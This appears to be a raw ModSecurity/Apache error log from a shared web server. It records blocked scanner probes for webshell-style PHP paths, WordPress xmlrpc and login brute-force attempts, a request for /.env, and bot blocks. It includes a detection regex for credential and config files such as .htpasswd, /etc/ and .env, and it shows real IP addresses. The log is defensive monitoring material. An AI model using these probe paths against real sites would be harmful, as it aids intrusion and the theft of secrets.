[Tue May 26 14:02:26.210678 2026] [security2:error] [pid 578581:tid 578769] [client 4.193.189.92:6752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/worksec.php"] [unique_id "ahVampm_8al1sb-umPttUwAAADo"]
[Tue May 26 14:02:26.921936 2026] [security2:error] [pid 578581:tid 578783] [client 4.193.189.92:6823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/wp-themes.php"] [unique_id "ahVampm_8al1sb-umPttagAAAEg"]
[Tue May 26 14:02:27.254868 2026] [security2:error] [pid 578581:tid 578831] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVampm_8al1sb-umPttaAAAAHg"]
[Tue May 26 14:02:27.682719 2026] [security2:error] [pid 578581:tid 578803] [client 4.193.189.92:6654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/wp-signin.php"] [unique_id "ahVam5m_8al1sb-umPttgwAAAFw"]
[Tue May 26 14:02:28.406823 2026] [security2:error] [pid 578581:tid 578811] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVanJm_8al1sb-umPttjwAAAGQ"]
[Tue May 26 14:02:28.435520 2026] [security2:error] [pid 578581:tid 578716] [client 4.193.189.92:1353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/wp-blog-header.php"] [unique_id "ahVanJm_8al1sb-umPttngAAAAU"]
[Tue May 26 14:02:28.704779 2026] [security2:error] [pid 578581:tid 578802] [client 129.222.147.134:37225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVanJm_8al1sb-umPttpQAAAFs"]
[Tue May 26 14:02:28.712568 2026] [security2:error] [pid 578581:tid 578802] [client 129.222.147.134:37225] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVanJm_8al1sb-umPttpQAAAFs"]
[Tue May 26 14:02:29.378363 2026] [security2:error] [pid 578581:tid 578713] [client 202.141.30.10:35532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVanZm_8al1sb-umPtttwAAAAI"]
[Tue May 26 14:02:29.378487 2026] [security2:error] [pid 578581:tid 578713] [client 202.141.30.10:35532] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVanZm_8al1sb-umPtttwAAAAI"]
[Tue May 26 14:02:29.396733 2026] [security2:error] [pid 578581:tid 578729] [client 4.193.189.92:6566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/ws.php"] [unique_id "ahVanZm_8al1sb-umPttuAAAABI"]
[Tue May 26 14:02:29.445744 2026] [security2:error] [pid 578581:tid 578806] [client 52.59.43.236:19144] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVanZm_8al1sb-umPttvwAAAF8"], referer: https://thegoodsporting.com
[Tue May 26 14:02:30.108226 2026] [security2:error] [pid 578581:tid 578770] [client 4.193.189.92:6646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/wsa.php"] [unique_id "ahVanpm_8al1sb-umPttzAAAADs"]
[Tue May 26 14:02:30.841178 2026] [security2:error] [pid 578581:tid 578728] [client 4.193.189.92:1557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/w.php"] [unique_id "ahVanpm_8al1sb-umPtt4gAAABE"]
[Tue May 26 14:02:31.068839 2026] [security2:error] [pid 578581:tid 578799] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVanpm_8al1sb-umPtt3gAAAFg"]
[Tue May 26 14:02:31.604182 2026] [security2:error] [pid 578581:tid 578750] [client 4.193.189.92:6881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/x.php"] [unique_id "ahVan5m_8al1sb-umPtt-wAAACc"]
[Tue May 26 14:02:32.056408 2026] [security2:error] [pid 578581:tid 578813] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVan5m_8al1sb-umPtt_wAAAGY"]
[Tue May 26 14:02:32.116843 2026] [ssl:error] [pid 578581:tid 578831] [client 18.235.110.182:5846] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname autodiscover.dolibarrtraining.azurmediatec.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:02:32.371890 2026] [security2:error] [pid 578581:tid 578718] [client 4.193.189.92:6720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/xx.php"] [unique_id "ahVaoJm_8al1sb-umPtuHgAAAAc"]
[Tue May 26 14:02:33.320997 2026] [security2:error] [pid 578581:tid 578777] [client 4.193.189.92:6778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/xmlrpc.php"] [unique_id "ahVaoZm_8al1sb-umPtuKwAAAEI"]
[Tue May 26 14:02:33.527997 2026] [security2:error] [pid 578581:tid 578743] [client 176.65.139.237:35312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "politica-global.com"] [uri "/.env"] [unique_id "ahVaoZm_8al1sb-umPtuNwAAACA"]
[Tue May 26 14:02:34.039239 2026] [security2:error] [pid 578581:tid 578776] [client 4.193.189.92:6577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/y.php"] [unique_id "ahVaopm_8al1sb-umPtuRwAAAEE"]
[Tue May 26 14:02:35.327314 2026] [security2:error] [pid 578581:tid 578836] [client 191.101.157.243:25398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.157.101.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVao5m_8al1sb-umPtubAAAAH0"]
[Tue May 26 14:02:37.027275 2026] [security2:error] [pid 578581:tid 578785] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVapJm_8al1sb-umPtujQAAAEo"]
[Tue May 26 14:02:37.930190 2026] [security2:error] [pid 578581:tid 578618] [remote 103.95.119.103:50798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVapZm_8al1sb-umPtutgAADiQ"]
[Tue May 26 14:02:38.386402 2026] [security2:error] [pid 578581:tid 578743] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVapZm_8al1sb-umPtuwQAAACA"]
[Tue May 26 14:02:38.990357 2026] [security2:error] [pid 578581:tid 578807] [client 129.222.147.134:20331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVappm_8al1sb-umPtu3AAAAGA"]
[Tue May 26 14:02:38.990607 2026] [security2:error] [pid 578581:tid 578807] [client 129.222.147.134:20331] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVappm_8al1sb-umPtu3AAAAGA"]
[Tue May 26 14:02:39.609537 2026] [security2:error] [pid 578581:tid 578770] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVap5m_8al1sb-umPtu5QAAADs"]
[Tue May 26 14:02:40.325705 2026] [security2:error] [pid 578581:tid 578768] [client 202.141.30.10:65518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaqJm_8al1sb-umPtvAQAAADk"]
[Tue May 26 14:02:40.325811 2026] [security2:error] [pid 578581:tid 578768] [client 202.141.30.10:65518] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaqJm_8al1sb-umPtvAQAAADk"]
[Tue May 26 14:02:41.443286 2026] [security2:error] [pid 578581:tid 578809] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaqZm_8al1sb-umPtvJwAAAGI"]
[Tue May 26 14:02:43.884975 2026] [security2:error] [pid 578581:tid 578820] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaq5m_8al1sb-umPtvcwAAAG0"]
[Tue May 26 14:02:45.337890 2026] [ssl:error] [pid 578581:tid 578829] [client 98.84.1.175:9387] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname whm.kmmc.co.in.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:02:45.642914 2026] [security2:error] [pid 578581:tid 578772] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVarZm_8al1sb-umPtvpwAAAD0"]
[Tue May 26 14:02:46.950802 2026] [security2:error] [pid 578581:tid 578729] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVarpm_8al1sb-umPtvyQAAABI"]
[Tue May 26 14:02:47.142515 2026] [security2:error] [pid 578581:tid 578689] [remote 74.7.241.58:58424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVar5m_8al1sb-umPtv2QAABms"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Site_Health
[Tue May 26 14:02:47.809506 2026] [security2:error] [pid 578581:tid 578809] [client 185.191.171.8:50534] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVar5m_8al1sb-umPtv6QAAAGI"]
[Tue May 26 14:02:47.809661 2026] [security2:error] [pid 578581:tid 578809] [client 185.191.171.8:50534] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVar5m_8al1sb-umPtv6QAAAGI"]
[Tue May 26 14:02:49.217043 2026] [security2:error] [pid 578581:tid 578766] [client 129.222.147.134:26395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVasZm_8al1sb-umPtwFAAAADc"]
[Tue May 26 14:02:49.228725 2026] [security2:error] [pid 578581:tid 578766] [client 129.222.147.134:26395] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVasZm_8al1sb-umPtwFAAAADc"]
[Tue May 26 14:02:49.420162 2026] [security2:error] [pid 578581:tid 578745] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVasZm_8al1sb-umPtwCgAAACI"]
[Tue May 26 14:02:51.052996 2026] [security2:error] [pid 578581:tid 578674] [remote 14.161.17.36:58498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVaspm_8al1sb-umPtwPwAAUlw"]
[Tue May 26 14:02:51.094141 2026] [security2:error] [pid 578581:tid 578740] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaspm_8al1sb-umPtwOwAAAB0"]
[Tue May 26 14:02:51.109343 2026] [security2:error] [pid 578581:tid 578714] [client 202.141.30.10:65357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVas5m_8al1sb-umPtwTgAAAAM"]
[Tue May 26 14:02:51.109476 2026] [security2:error] [pid 578581:tid 578714] [client 202.141.30.10:65357] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVas5m_8al1sb-umPtwTgAAAAM"]
[Tue May 26 14:02:52.911904 2026] [security2:error] [pid 578581:tid 578749] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVatJm_8al1sb-umPtwfAAAACY"]
[Tue May 26 14:02:54.370369 2026] [security2:error] [pid 578581:tid 578758] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVatZm_8al1sb-umPtwqAAAAC8"]
[Tue May 26 14:02:56.722417 2026] [security2:error] [pid 578581:tid 578746] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVauJm_8al1sb-umPtw8AAAACM"]
[Tue May 26 14:02:58.476738 2026] [security2:error] [pid 578581:tid 578724] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaupm_8al1sb-umPtxKQAAAA0"]
[Tue May 26 14:03:00.216228 2026] [security2:error] [pid 578581:tid 578722] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVau5m_8al1sb-umPtxYAAAAAs"]
[Tue May 26 14:03:02.051077 2026] [security2:error] [pid 578581:tid 578805] [client 202.141.30.10:35573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVavpm_8al1sb-umPtxrgAAAF4"]
[Tue May 26 14:03:02.051582 2026] [security2:error] [pid 578581:tid 578805] [client 202.141.30.10:35573] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVavpm_8al1sb-umPtxrgAAAF4"]
[Tue May 26 14:03:02.158365 2026] [security2:error] [pid 578581:tid 578761] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVavZm_8al1sb-umPtxnQAAADI"]
[Tue May 26 14:03:02.193803 2026] [security2:error] [pid 578581:tid 578588] [remote 94.76.235.103:48132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVavpm_8al1sb-umPtxrQAAOwY"]
[Tue May 26 14:03:02.654605 2026] [security2:error] [pid 578581:tid 578728] [client 106.63.26.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVavpm_8al1sb-umPtxuwAAABE"]
[Tue May 26 14:03:03.487876 2026] [security2:error] [pid 578581:tid 578807] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVav5m_8al1sb-umPtxygAAAGA"]
[Tue May 26 14:03:05.671398 2026] [security2:error] [pid 578581:tid 578788] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVawZm_8al1sb-umPtyCgAAAE0"]
[Tue May 26 14:03:07.471165 2026] [security2:error] [pid 578581:tid 578713] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaw5m_8al1sb-umPtyPgAAAAI"]
[Tue May 26 14:03:09.030527 2026] [security2:error] [pid 578581:tid 578784] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaxJm_8al1sb-umPtybwAAAEk"]
[Tue May 26 14:03:09.281856 2026] [security2:error] [pid 578581:tid 578772] [client 106.63.26.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVaxZm_8al1sb-umPtygwAAAD0"]
[Tue May 26 14:03:09.303636 2026] [security2:error] [pid 578581:tid 578648] [remote 95.216.117.13:35858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVaxZm_8al1sb-umPtyfwAAU0I"]
[Tue May 26 14:03:10.601611 2026] [security2:error] [pid 578581:tid 578726] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaxpm_8al1sb-umPtynAAAAA8"]
[Tue May 26 14:03:12.973407 2026] [security2:error] [pid 578581:tid 578755] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVayJm_8al1sb-umPty7AAAACw"]
[Tue May 26 14:03:13.140040 2026] [security2:error] [pid 578581:tid 578758] [client 202.141.30.10:65293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVayZm_8al1sb-umPty9wAAAC8"]
[Tue May 26 14:03:13.140187 2026] [security2:error] [pid 578581:tid 578758] [client 202.141.30.10:65293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVayZm_8al1sb-umPty9wAAAC8"]
